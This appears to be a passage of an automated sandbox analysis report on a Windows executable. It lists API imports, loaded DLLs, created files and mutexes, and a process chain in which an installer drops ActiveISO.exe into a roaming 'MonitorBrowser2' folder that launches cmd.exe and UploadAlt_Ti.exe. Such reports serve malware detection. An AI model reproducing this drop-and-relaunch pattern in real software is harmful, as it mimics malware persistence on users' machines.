Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FF72A924050 ?setAttribute@QCoreApplication@@SAXW4ApplicationAttribute@Qt@@_N@Z,??0QApplication@@QEAA@AEAHPEAPEADH@Z,?applicationDirPath@QCoreApplication@@SA?AVQString@@XZ,?toNativeSeparators@QDir@@SA?AVQString@@AEBV2@@Z,??0QByteArray@@QEAA@AEBV0@@Z,?fromUtf8@QString@@SA?AV1@PEBDH@Z,?append@QString@@QEAAAEAV1@AEBV1@@Z,??1QString@@QEAA@XZ,??4QString@@QEAAAEAV0@AEBV0@@Z,??1QString@@QEAA@XZ,??1QString@@QEAA@XZ,??1QString@@QEAA@XZ,??0QByteArray@@QEAA@AEBV0@@Z,?fromUtf8@QString@@SA?AV1@PEBDH@Z,?append@QString@@QEAAAEAV1@AEBV1@@Z,??1QString@@QEAA@XZ,??1QString@@QEAA@XZ,?fromLocal8Bit@QString@@SA?AV1@PEBDH@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,??0QChar@@QEAA@UQLatin1Char@@@Z,?arg@QString@@QEBA?AV1@AEBV1@HVQChar@@@Z,??1QString@@QEAA@XZ,??1QString@@QEAA@XZ,?toUpper@QString@@QEGBA?AV1@XZ,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?indexOf@QString@@QEBAHAEBV1@HW4CaseSensitivity@Qt@@@Z,??1QString@@QEAA@XZ,?remove@QString@@QEAAAEAV1@HH@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?replace@QString@@QEAAAEAV1@AEBV1@0W4CaseSensitivity@Qt@@@Z,??1QString@@QEAA@XZ,??1QString@@QEAA@XZ,??4QString@@QEAAAEAV0@AEBV0@@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?indexOf@QString@@QEBAHAEBV1@HW4CaseSensitivity@Qt@@@Z,??1QString@@QEAA@XZ,?remove@QString@@QEAAAEAV1@HH@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?replace@QString@@QEAAAEAV1@AEBV1@0W4CaseSensitivity@Qt@@@Z,??1QString@@QEAA@XZ,??1QString@@QEAA@XZ,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?indexOf@QString@@QEBAHAEBV1@HW4CaseSensitivity@Qt@@@Z,??1QString@@QEAA@XZ,?remove@QString@@QEAAAEAV1@HH@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?replace@QString@@QEAAAEAV1@AEBV1@0W4CaseSensitivity@Qt@@@Z,??1QString@@QEAA@XZ,??1QString@@QEAA@XZ,??4QString@@QEAAAEAV0@AEBV0@@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?indexOf@QString@@QEBAHAEBV1@HW4CaseSensitivity@Qt@@@Z,??1QString@@QEAA@XZ,?remove@QString@@QEAAAEAV1@HH@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?replace@QString@@QEAAAEAV1@AEBV1@0W4CaseSensitivity@Qt@@@Z,??1QString@@QEAA@XZ,??1QString@@QEAA@XZ,??4QString@@QEAAAEAV0@AEBV0@@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?indexOf@QString@@QEBAHAEBV1@HW4CaseSensitivity@Qt@@@Z,??1QString@@QEAA@XZ,?remove@QString@@QEAAAEAV1@HH@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?replace@QString@@QEAAAEAV1@AEBV1@0W4CaseSensitivity@Qt@@@Z,??1QString@@QEAA@XZ,??1QString@@QEAA@XZ,??4QString@@QEAAAEAV0@AEBV0@@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?indexOf@QString@@QEBAHAEB	3_2_00007FF72A924050
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FF7F4134050 ?setAttribute@QCoreApplication@@SAXW4ApplicationAttribute@Qt@@_N@Z,??0QApplication@@QEAA@AEAHPEAPEADH@Z,?applicationDirPath@QCoreApplication@@SA?AVQString@@XZ,?toNativeSeparators@QDir@@SA?AVQString@@AEBV2@@Z,??0QByteArray@@QEAA@AEBV0@@Z,?fromUtf8@QString@@SA?AV1@PEBDH@Z,?append@QString@@QEAAAEAV1@AEBV1@@Z,??1QString@@QEAA@XZ,??4QString@@QEAAAEAV0@AEBV0@@Z,??1QString@@QEAA@XZ,??1QString@@QEAA@XZ,??1QString@@QEAA@XZ,??0QByteArray@@QEAA@AEBV0@@Z,?fromUtf8@QString@@SA?AV1@PEBDH@Z,?append@QString@@QEAAAEAV1@AEBV1@@Z,??1QString@@QEAA@XZ,??1QString@@QEAA@XZ,?fromLocal8Bit@QString@@SA?AV1@PEBDH@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,??0QChar@@QEAA@UQLatin1Char@@@Z,?arg@QString@@QEBA?AV1@AEBV1@HVQChar@@@Z,??1QString@@QEAA@XZ,??1QString@@QEAA@XZ,?toUpper@QString@@QEGBA?AV1@XZ,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?indexOf@QString@@QEBAHAEBV1@HW4CaseSensitivity@Qt@@@Z,??1QString@@QEAA@XZ,?remove@QString@@QEAAAEAV1@HH@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?replace@QString@@QEAAAEAV1@AEBV1@0W4CaseSensitivity@Qt@@@Z,??1QString@@QEAA@XZ,??1QString@@QEAA@XZ,??4QString@@QEAAAEAV0@AEBV0@@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?indexOf@QString@@QEBAHAEBV1@HW4CaseSensitivity@Qt@@@Z,??1QString@@QEAA@XZ,?remove@QString@@QEAAAEAV1@HH@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?replace@QString@@QEAAAEAV1@AEBV1@0W4CaseSensitivity@Qt@@@Z,??1QString@@QEAA@XZ,??1QString@@QEAA@XZ,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?indexOf@QString@@QEBAHAEBV1@HW4CaseSensitivity@Qt@@@Z,??1QString@@QEAA@XZ,?remove@QString@@QEAAAEAV1@HH@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?replace@QString@@QEAAAEAV1@AEBV1@0W4CaseSensitivity@Qt@@@Z,??1QString@@QEAA@XZ,??1QString@@QEAA@XZ,??4QString@@QEAAAEAV0@AEBV0@@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?indexOf@QString@@QEBAHAEBV1@HW4CaseSensitivity@Qt@@@Z,??1QString@@QEAA@XZ,?remove@QString@@QEAAAEAV1@HH@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?replace@QString@@QEAAAEAV1@AEBV1@0W4CaseSensitivity@Qt@@@Z,??1QString@@QEAA@XZ,??1QString@@QEAA@XZ,??4QString@@QEAAAEAV0@AEBV0@@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?indexOf@QString@@QEBAHAEBV1@HW4CaseSensitivity@Qt@@@Z,??1QString@@QEAA@XZ,?remove@QString@@QEAAAEAV1@HH@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?replace@QString@@QEAAAEAV1@AEBV1@0W4CaseSensitivity@Qt@@@Z,??1QString@@QEAA@XZ,??1QString@@QEAA@XZ,??4QString@@QEAAAEAV0@AEBV0@@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?indexOf@QString@@QEBAHAEB	4_2_00007FF7F4134050

Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe

Code function: 3_2_00007FF72A910AE0 Sleep,??4QString@@QEAAAEAV0@PEBD@Z,??4QString@@QEAAAEAV0@PEBD@Z,??4QString@@QEAAAEAV0@PEBD@Z,?shared_null@QListData@@2UData@1@B,?dispose@QListData@@SAXPEAUData@1@@Z,?dispose@QListData@@SAXPEAUData@1@@Z,?selectedItems@QTreeWidget@@QEBA?AV?$QList@PEAVQTreeWidgetItem@@@@XZ,?shared_null@QListData@@2UData@1@B,?dispose@QListData@@SAXPEAUData@1@@Z,?dispose@QListData@@SAXPEAUData@1@@Z,?isEmpty@QListData@@QEBA_NXZ,??4QString@@QEAAAEAV0@PEBD@Z,?at@QListData@@QEBAPEAPEAXH@Z,?text@QTreeWidgetItem@@QEBA?AVQString@@H@Z,?toLong@QString@@QEBAJPEA_NH@Z,??1QString@@QEAA@XZ,?at@QListData@@QEBAPEAPEAXH@Z,?at@QListData@@QEBAPEAPEAXH@Z,?childCount@QTreeWidgetItem@@QEBAHXZ,?at@QListData@@QEBAPEAPEAXH@Z,?child@QTreeWidgetItem@@QEBAPEAV1@H@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?split@QString@@QEBA?AVQStringList@@AEBV1@W4SplitBehavior@1@W4CaseSensitivity@Qt@@@Z,??1QString@@QEAA@XZ,?size@QListData@@QEBAHXZ,?size@QListData@@QEBAHXZ,?at@QListData@@QEBAPEAPEAXH@Z,?child@QTreeWidgetItem@@QEBAPEAV1@H@Z,?text@QTreeWidgetItem@@QEBA?AVQString@@H@Z,?toLong@QString@@QEBAJPEA_NH@Z,??1QString@@QEAA@XZ,?at@QListData@@QEBAPEAPEAXH@Z,?child@QTreeWidgetItem@@QEBAPEAV1@H@Z,?at@QListData@@QEBAPEAPEAXH@Z,?child@QTreeWidgetItem@@QEBAPEAV1@H@Z,?at@QListData@@QEBAPEAPEAXH@Z,?child@QTreeWidgetItem@@QEBAPEAV1@H@Z,?text@QTreeWidgetItem@@QEBA?AVQString@@H@Z,?toLongLong@QString@@QEBA_JPEA_NH@Z,??1QString@@QEAA@XZ,??1QString@@QEAA@XZ,?dispose@QListData@@SAXPEAUData@1@@Z,??1QString@@QEAA@XZ,??4QString@@QEAAAEAV0@PEBD@Z,?at@QListData@@QEBAPEAPEAXH@Z,?size@QListData@@QEBAHXZ,?at@QListData@@QEBAPEAPEAXH@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?split@QString@@QEBA?AVQStringList@@AEBV1@W4SplitBehavior@1@W4CaseSensitivity@Qt@@@Z,??1QString@@QEAA@XZ,?size@QListData@@QEBAHXZ,?size@QListData@@QEBAHXZ,?at@QListData@@QEBAPEAPEAXH@Z,?text@QTreeWidgetItem@@QEBA?AVQString@@H@Z,?toLong@QString@@QEBAJPEA_NH@Z,??1QString@@QEAA@XZ,?at@QListData@@QEBAPEAPEAXH@Z,?at@QListData@@QEBAPEAPEAXH@Z,?text@QTreeWidgetItem@@QEBA?AVQString@@H@Z,?toLong@QString@@QEBAJPEA_NH@Z,??1QString@@QEAA@XZ,?at@QListData@@QEBAPEAPEAXH@Z,?at@QListData@@QEBAPEAPEAXH@Z,?at@QListData@@QEBAPEAPEAXH@Z,?text@QTreeWidgetItem@@QEBA?AVQString@@H@Z,?toLongLong@QString@@QEBA_JPEA_NH@Z,??1QString@@QEAA@XZ,??1QString@@QEAA@XZ,?dispose@QListData@@SAXPEAUData@1@@Z,??1QString@@QEAA@XZ,?size@QListData@@QEBAHXZ,memset,??0QByteArray@@QEAA@AEBV0@@Z,?resize@QString@@QEAAXH@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?replace@QString@@QEAAAEAV1@AEBV1@0W4CaseSensitivity@Qt@@@Z,??1QString@@QEAA@XZ,??1QString@@QEAA@XZ,?toWCharArray@QString@@QEBAHPEA_W@Z,GetDiskFreeSpaceW,?fromUtf8@QString@@SA?AV1@PEBDH@Z,?append@QString@@QEAAAEAV1@AEBV1@@Z,??4QString@@QEAAAEAV0@AEBV0@@Z,??1QString@@QEAA@XZ,??4QString@@QEAAAEAV0@PEBD@Z,memset,?toWCharArray@QString@@QEBAHPEA_W@Z,CreateFileW,?size@QListData@@QEBAHXZ,?at@QListData@@QEBAPEAP

3_2_00007FF72A910AE0

Source: C:\Users\user\Desktop\BkTwXj17DH.exe

Code function: 0_2_0050304F GetModuleHandleA,GetLastError,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CoCreateInstance,ExitProcess,

0_2_0050304F

Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe

Code function: 2_2_6FFF1D90 LoadResource,LockResource,SizeofResource,

2_2_6FFF1D90

Source: C:\Users\user\Desktop\BkTwXj17DH.exe

Code function: 0_2_004E6B88 ChangeServiceConfigW,GetLastError,

0_2_004E6B88

Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe

File created: C:\Users\user\AppData\Roaming\MonitorBrowser2

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3508:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7944:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2660:120:WilError_03

Source: C:\Users\user\Desktop\BkTwXj17DH.exe

File created: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\

Jump to behavior

Source: C:\Users\user\Desktop\BkTwXj17DH.exe	Command line argument: cabinet.dll	0_2_004C1070
Source: C:\Users\user\Desktop\BkTwXj17DH.exe	Command line argument: msi.dll	0_2_004C1070
Source: C:\Users\user\Desktop\BkTwXj17DH.exe	Command line argument: version.dll	0_2_004C1070
Source: C:\Users\user\Desktop\BkTwXj17DH.exe	Command line argument: wininet.dll	0_2_004C1070
Source: C:\Users\user\Desktop\BkTwXj17DH.exe	Command line argument: comres.dll	0_2_004C1070
Source: C:\Users\user\Desktop\BkTwXj17DH.exe	Command line argument: clbcatq.dll	0_2_004C1070
Source: C:\Users\user\Desktop\BkTwXj17DH.exe	Command line argument: msasn1.dll	0_2_004C1070
Source: C:\Users\user\Desktop\BkTwXj17DH.exe	Command line argument: crypt32.dll	0_2_004C1070
Source: C:\Users\user\Desktop\BkTwXj17DH.exe	Command line argument: feclient.dll	0_2_004C1070
Source: C:\Users\user\Desktop\BkTwXj17DH.exe	Command line argument: cabinet.dll	0_2_004C1070
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	Command line argument: cabinet.dll	2_2_00D51070
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	Command line argument: msi.dll	2_2_00D51070
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	Command line argument: version.dll	2_2_00D51070
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	Command line argument: wininet.dll	2_2_00D51070
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	Command line argument: comres.dll	2_2_00D51070
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	Command line argument: clbcatq.dll	2_2_00D51070
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	Command line argument: msasn1.dll	2_2_00D51070
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	Command line argument: crypt32.dll	2_2_00D51070
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	Command line argument: feclient.dll	2_2_00D51070
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	Command line argument: cabinet.dll	2_2_00D51070

Source: BkTwXj17DH.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\cmd.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\BkTwXj17DH.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: BkTwXj17DH.exe	String found in binary or memory: Failed to re-launch bundle process after RunOnce: %ls
Source: BkTwXj17DH.exe	String found in binary or memory: Failed to re-launch bundle process after RunOnce: %ls
Source: ActiveISO.exe	String found in binary or memory: :/chookIsoManager/Resources/load.png
Source: ActiveISO.exe	String found in binary or memory: /ADD=
Source: ActiveISO.exe	String found in binary or memory: /ADD=
Source: ActiveISO.exe	String found in binary or memory: :/chookIsoManager/Resources/load.png

Source: C:\Users\user\Desktop\BkTwXj17DH.exe

File read: C:\Users\user\Desktop\BkTwXj17DH.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\BkTwXj17DH.exe "C:\Users\user\Desktop\BkTwXj17DH.exe"
Source: C:\Users\user\Desktop\BkTwXj17DH.exe	Process created: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe "C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe" -burn.clean.room="C:\Users\user\Desktop\BkTwXj17DH.exe" -burn.filehandle.attached=516 -burn.filehandle.self=524
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	Process created: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe "C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe"
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Process created: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe "C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe"
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe "C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe"
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe
Source: C:\Users\user\Desktop\BkTwXj17DH.exe	Process created: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe "C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe" -burn.clean.room="C:\Users\user\Desktop\BkTwXj17DH.exe" -burn.filehandle.attached=516 -burn.filehandle.self=524	Jump to behavior
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	Process created: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe "C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe"	Jump to behavior
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Process created: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Jump to behavior

Source: C:\Users\user\Desktop\BkTwXj17DH.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\BkTwXj17DH.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\BkTwXj17DH.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Users\user\Desktop\BkTwXj17DH.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\BkTwXj17DH.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\user\Desktop\BkTwXj17DH.exe	Section loaded: msxml3.dll	Jump to behavior
Source: C:\Users\user\Desktop\BkTwXj17DH.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\BkTwXj17DH.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\BkTwXj17DH.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\BkTwXj17DH.exe	Section loaded: feclient.dll	Jump to behavior
Source: C:\Users\user\Desktop\BkTwXj17DH.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\BkTwXj17DH.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	Section loaded: msxml3.dll	Jump to behavior
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	Section loaded: feclient.dll	Jump to behavior
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Section loaded: starburn.dll	Jump to behavior
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Section loaded: qt5printsupport.dll	Jump to behavior
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Section loaded: qt5widgets.dll	Jump to behavior
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Section loaded: qt5gui.dll	Jump to behavior
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Section loaded: qt5network.dll	Jump to behavior
